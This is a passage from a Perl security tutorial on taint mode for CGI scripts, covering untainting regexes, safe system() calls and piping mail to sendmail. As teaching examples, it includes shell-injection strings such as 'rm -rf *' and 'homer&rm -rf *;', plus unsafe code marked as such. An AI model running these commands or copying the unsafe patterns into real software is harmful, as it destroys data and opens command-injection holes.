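sub untaint_with {
    my ($value, $pattern) = @_;
    return undef unless defined $value;
    if ($value =~ $pattern) {
        return $1;
    }
    return undef;
}

# One group around the whole address; \A and \z anchor both ends.
my $email_re = qr/\A(\w[\w.-]*\@[\w.-]+)\z/;
my $name_re  = qr/\A(\w+)\z/;

my $email     = untaint_with('homer@simpsons.com', $email_re);
my $firstname = untaint_with('rm -rf *',           $name_re);

# The failed firstname match yields undef, not the email address.
print(defined($email)     ? "email ok: $email\n"    : "email rejected\n");
print(defined($firstname) ? "name ok: $firstname\n" : "name rejected\n");
```

Because the caller only ever sees the return value, it has to test for undef before using the data, which is the same check as the if/else shown earlier.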

Why Not Just Clear Taint Mode With An Open Regular Expression?


Perl usually has a good reason for thinking the input is unsafe. For example, there is a common misconception that HIDDEN INPUT tags on an HTML form that are generated by a CGI script are ``safe''. This is not true because a user could easily mimic your form by making their own HTML form with bogus values. A programmer who blindly untaints HIDDEN INPUT tag values will be in hot water if someone does end up spoofing the values.

Taint mode will catch all this. Avoid the temptation to quickly dismiss a tainted variable by using an ``open'' regular expression. This cannot be emphasized enough. An example of such an open regular expression follows:


    $email =~ /(.*)/;
    $email = $1;

This will match any input. Thus, effectively no check has actually been done. Yet the $email variable has been untainted.

[ TOC ]

How To Choose An Untaint Regular Expression

Apart from the mantra that you should never blindly choose a completely open regular expression such as .* to untaint a value, you will typically still be faced with some choice as to how to create a regular expression to untaint your variable.

At minimum, you know that we should filter out shell meta characters that might be interpreted badly by an external system call. There are two different ways to come up with a regular expression: rejection of characters and the acceptance of characters.

It is natural to think that we should write an untaint expression to be based off the rejection of characters we deem 'bad'. This will usually 'work' in the practical sense of the word. However, while you are untainting, you should consider honing your regular expression around the specific data that you are attempting to untaint.

By approaching the regular expression from the point of view of accepting only characters that are valid for the data being untainted, you strengthen the regular expression so that it doubles as a data validation routine.

This is important because logic errors may crop up in a program where bad data is placed in a value by a user. To avoid logic errors due to hacking, it is best to hone the regular expression around accepting only those characters that make sense for the data you are dealing with while at the same time filtering all the typical shell meta characters.

Recall that Perl considers $1 to be safe now because it trusts that you tested the validity of the variable using the regular expression. Perl cannot and does not judge your regular expression. If you choose to make it too loose, like the open .* expression shown earlier, then Perl will let you.

If you do this, you are short changing the point of taint mode which is to make you sit down and think ``What input do I really want and how do I restrict myself to just that set of characters?''.
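The difference between the two approaches can be sketched as follows, assuming a hypothetical form field that should hold a quantity of one to four digits. Both function names and the list of rejected characters are made up for this illustration.

```perl
use strict;
use warnings;

# Rejection approach: refuse values that contain a few known-bad
# characters. Anything we forgot to list (a backtick, a newline, ...)
# still gets through.
sub untaint_by_rejection {
    my ($value) = @_;
    return undef unless defined $value;
    return $value =~ /\A([^;&|<>]*)\z/ ? $1 : undef;
}

# Acceptance approach: a quantity is one to four digits and nothing else.
sub untaint_quantity {
    my ($value) = @_;
    return undef unless defined $value;
    return $value =~ /\A([0-9]{1,4})\z/ ? $1 : undef;
}

for my $input ('12', '12`id`', '-5', '99999') {
    my $loose  = untaint_by_rejection($input);
    my $strict = untaint_quantity($input);
    printf "%-8s rejection: %-7s acceptance: %s\n",
        $input,
        (defined($loose)  ? 'passes' : 'fails'),
        (defined($strict) ? 'passes' : 'fails');
}
```

The acceptance version doubles as data validation: a negative number or a five digit quantity is turned away even though neither contains a shell metacharacter.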

[ TOC ]

Fixing Script Problems In Taint Mode

There are two potentially unsafe operations that tend to cause the most problems with taint mode activated. The first is the execution of external programs and the other is loading code to evaluate. To troubleshoot these operations it is important to understand where taint mode evolved from.

Taint mode has been around longer than CGI scripts have been around. So you might ask yourself why was taint mode placed in Perl?

Part of Perl's origins came from systems administration. Unfortunately, SysAdmin scripts usually need to be run as a privileged user such as root. Thus, Perl was endowed with the power of taint mode in order to make writing systems administration scripts more secure.

Unfortunately, this means that taint mode is frequently more paranoid than we would like for CGI scripts. This is because SysAdmin scripts were assumed capable of being executed directly from a UNIX shell. This is less secure because a user has a great deal of control over the environment of the UNIX shell including the ability to change the path that executables are located in.

On the other hand, a web server provides a more secure environment because users who run a CGI script do not have the capability of changing the script's search path information.

One example of this is the PATH environment variable. As long as PATH still holds the value inherited from the environment, taint mode stops scripts from running an external program. This means that we must set the path to a known value (or clear it) and use absolute paths inside of system calls and other external program calls in Perl using taint mode.

This restriction makes sense for a SysAdmin script where a user could change the PATH environment variable at will and then run the SysAdmin script with potentially changed behavior.

This level of paranoia makes less sense for CGI programs. However, paranoia is what taint mode is all about and it is relatively easy to fix this issue by configuring your script to use absolute paths.
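A minimal sketch of this fix is shown below. The directories placed in PATH and the location of the date program are assumptions about your server, and the function name secure_environment is our own. The list of extra variables to delete follows the advice in the perlsec manual page.

```perl
use strict;
use warnings;

# Give the script a fixed, minimal search path and remove the other
# environment variables that can change how a shell behaves.
sub secure_environment {
    $ENV{PATH} = '/bin:/usr/bin';               # assumed safe directories
    delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
    return;
}

secure_environment();

# Call external programs by absolute path. /bin/date is only an example
# and is skipped if it does not exist on this machine.
my $date = '/bin/date';
if (-x $date) {
    system($date) == 0 or warn "$date exited with status $?\n";
}
```

Calling secure_environment() once near the top of the script, before any external program is run, is usually enough.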

Likewise, when taint mode is on, the current directory is no longer considered valid for loading library or module files. Again, this is paranoid behavior assuming that we could place our own subversive version of a library in the current directory in order to change the behavior of a SysAdmin script. However, CGI scripts called from a browser do not have to worry about arbitrary code being uploaded to a server. If this is possible on your web server, then you have a lot more problems to worry about.

But like the PATH problem, this library issue is easy to resolve as well. If you wish to add library search paths from the current working directory simply use the 'use lib' pragma. The following code would add back the current working directory plus a Modules directory underneath it to the library search path.

    use lib qw(. ./Modules);

[ TOC ]

Final Taint Mode Tips

Before leaving this section, we'll provide a few take home messages about taint mode.

First, consider logging bad taint/regular expression matches. If you are writing applications which use this module set, please consider utilizing the log feature in order to record the situation in which users enter bad data in your forms.

Second, use the Web Server's error log. The error log is there to catch errors. Even if you are not worried about taint mode problems occurring, you should be checking the error log vigilantly in case other errors are occurring. Remember, taint mode is not a security panacea. Logic errors in your code can result in security issues as well.

Don't Rely Solely on Regular Expressions

This leads us to our third and most important taint mode point. Never trust taint mode to do your work for you. You must always consider all logical flows through your program and consider whether you want them allowed. Always consider security a top priority.

For example, earlier we gave an example of untainting an email address. This is all very well, but it is a very generic untaint operation. What if your application must be more secure than that?

What if you only want to allow certain domains to be emailed or a certain list of email users? If this is the case, then you should always write the most strict code possible. Make sure that only those email addresses can be mailed and no others. Otherwise you may be opening your program up to unexpected behavior.

Unexpected behavior is undesirable. Avoid it at all costs.

However, this does not mean that you should make your program inflexible. If you want to limit email addresses, do not hard code the email addresses in your program. Instead, consider placing an array of valid email addresses in the setup file so that your valid email list can be changed later on.
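As a rough sketch of this idea, the code below checks a submitted address against a configured list. The variable name @VALID_RECIPIENTS, the function name lookup_recipient, and the addresses are all hypothetical. In a real application the list would be read from the setup file rather than written in the script.

```perl
use strict;
use warnings;

# Stand-in for a list that would normally come from the setup file.
my @VALID_RECIPIENTS = qw(
    sales@example.com
    support@example.com
);

# Index the configured addresses by their lower-case form.
my %recipient_for;
$recipient_for{lc $_} = $_ for @VALID_RECIPIENTS;

# Return the configured address that matches the user's input, or undef.
# The caller mails the configured value, never the string the user sent.
sub lookup_recipient {
    my ($address) = @_;
    return undef unless defined $address;
    return $recipient_for{lc $address};
}

for my $input ('Sales@Example.com', 'attacker@evil.example') {
    my $recipient = lookup_recipient($input);
    print "$input: ", (defined($recipient) ? "mail $recipient" : 'refused'), "\n";
}
```

Because the value handed back comes from your own configuration, the user can only choose among addresses you have already approved.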

Avoid Needing to Untaint in the first Place

In addition, avoid passing user-supplied variables to external programs, even untainted ones, if you can help it. In our mail example, we passed the email address to the mail program on the command-line. However, there are two better ways of doing this.

First, we can avoid passing the email address as a command line parameter entirely by simply using a different mail program. For example, the UNIX sendmail program has an option to allow the Email address to be placed in STDIN.
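The first option might look something like the sketch below. It assumes sendmail lives at /usr/sbin/sendmail, and the function names and example addresses are ours. The -t switch asks sendmail to take the recipients from the message headers, and -oi stops a line containing a single dot from ending the message. Note that in taint mode the PATH fix described earlier is still needed before the pipe can be opened.

```perl
use strict;
use warnings;

my $SENDMAIL = '/usr/sbin/sendmail';   # assumed location; adjust for your server

# Build the message text. Header values must not contain line breaks,
# otherwise a user could smuggle in extra headers.
sub build_message {
    my (%arg) = @_;
    for my $field (qw(to from subject)) {
        die "missing or multi-line $field\n"
            if !defined($arg{$field}) || $arg{$field} =~ /[\r\n]/;
    }
    my $body = defined($arg{body}) ? $arg{body} : '';
    return "To: $arg{to}\n"
         . "From: $arg{from}\n"
         . "Subject: $arg{subject}\n"
         . "\n"
         . "$body\n";
}

# Pipe the message to sendmail. The address travels on STDIN only;
# nothing supplied by the user appears on the command line.
sub send_message {
    my (%arg) = @_;
    my $message = build_message(%arg);
    open(my $mail, '|-', $SENDMAIL, '-t', '-oi')
        or die "cannot run $SENDMAIL: $!\n";
    print {$mail} $message;
    close($mail) or die "sendmail failed: status $?\n";
    return 1;
}

# Example call (not executed here):
#   send_message(to => $email, from => 'web@example.com',
#                subject => 'Thanks', body => 'We received your order.');
```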

A second thing we can do is call the mail program by passing the email address as a parameter array instead of a single string to the system() call. When a single string is passed to system() Perl passes the string to the shell for processing the command-line parameters. Unfortunately, as we have seen, this means we must filter out shell metacharacters.

If the command-line parameters are passed to the system() call as an array of parameters, the system() call will not parse them using the shell, and so we can safely pass shell metacharacters in the email address. For example, the following system() command is unsafe if the email address is still tainted.

    system("mail " . $cgi->param("email"));

However, we can mitigate this by passing the parameter as an element of the array of parameters instead of one concatenated string. The following code snippet illustrates this method of calling system().
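A minimal sketch of the list form, assuming the mail program is installed as /usr/bin/mail (the function names are ours):

```perl
use strict;
use warnings;

my $MAIL_PROGRAM = '/usr/bin/mail';   # assumed location of the mail program

# Build the argument list. Each element reaches the program as one
# argument, exactly as written, because no shell is involved.
sub mail_command {
    my ($address) = @_;
    return ($MAIL_PROGRAM, $address);
}

# List form of system(): the program is executed directly.
sub run_mail {
    my ($address) = @_;
    my @command = mail_command($address);
    return system(@command) == 0;
}

# In a CGI script this would be called as, for example:
#   run_mail(scalar $cgi->param('email')) or warn "mail failed\n";
```

Keep in mind that current versions of Perl running in taint mode refuse tainted arguments to system() even in the list form, so the address still has to be untainted first. The benefit is that the untaint pattern no longer has to exclude shell metacharacters, although it should still refuse a leading dash.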


It turns out that there is a very good reason that we may not wish to pass email addresses that have been untainted by the regular expression we explained earlier. The problem is that if we use the regular expression we discussed previously to untaint variables, we will potentially miss out on some email addresses. The reason for this is that our regular expression was too restrictive.

Valid email addresses on the Internet allow such shell metacharacters as /, &, and %. Consider the & character. Just like the semi-colon discussed previously, & can be used to separate commands. Thus, if we expand the email untaint regular expression to include &, to allow an address like homer&marge@simpsons.com, we are potentially opening up a hole. Consider the following command:

    mail homer&rm -rf *;

This is very similar to the command where we used the semi-colon as a shell metacharacter command delimiter previously. While it is true that this scenario is hard to run across, you should take to heart that it is difficult to anticipate what shell metacharacter combination might be called into action.

Avoid the 'Russian Dolls' Scenario

A final piece of advice in taint mode security is to avoid the ``Russian Dolls'' scenario. You should not just think about your program and the program you are passing a tainted variable to. You should also consider all the subsequent programs that might be called.

Usually this is not a problem. But what if it is? In the last taint mode tip, we mentioned that there was a way to call sendmail by passing the email address through STDIN instead of on the command line. This is much safer because then shell escape characters will not get interpreted in STDIN.

Or will they?

What if, behind the scenes, the sendmail binary actually called another program and passed it command line parameters using the email address? If this was the case, our previously 'secure' solution would be cracked wide open.

Is this far fetched? Maybe yes. It turns out that the standard sendmail binary does not suffer from this ``Russian Doll'' scenario.

However, history does repeat itself. While unlikely, it is not entirely out of the question that an ISP running a third party sendmail system would wish to write a sendmail program that converts calls to sendmail to the new third-party mail system. It is conceivable that mistakes might be made in this bridging code even to the extent of passing previously safe variables as command line parameters to the new system.

While this is an unlikely scenario for sendmail, wrapper programs exist everywhere. This is why scripting, especially Perl scripting, is so popular. One Perl program can act as a glue for many other programs. It is Perl’s strength.

Thus, you might think you are securely calling one program, but if that program in turn calls many other programs, you should be aware of how it is doing it. For example, not everyone else's Perl scripts you might call will use taint mode. And not everyone writes in Perl, so taint mode may not even be available to them as a tool. Always consider the entire path that your variable will take when you pass it along to another program.

[ TOC ]

Taint Mode Summary

Has all of this given you a headache yet? To some degree it should. Security is serious business. At least take solace in the fact that many people are like us, mere mortals. It does not take a security genius to look at every CGI script to make sure it is secure.

Rather, it takes some amount of vigilance on your part and also on the part of everyone else using your source code to make sure your programs are secure. It's not a matter of a one time security check either. New exploits are published all the time, and subsequently new fixes are published all the time.

To some degree, publishing your code is the best thing you can do to help ensure safe CGI. The more you use objects that have been checked over by a community of programmers, the more you can rely on the program being free of bugs, including security bugs.

[ TOC ]

Master Copy URL: /support/docs/adt/
Copyright © 2000-2001 Extropia. All rights reserved.
Written by eXtropia.
Last Modified at 09/20/2001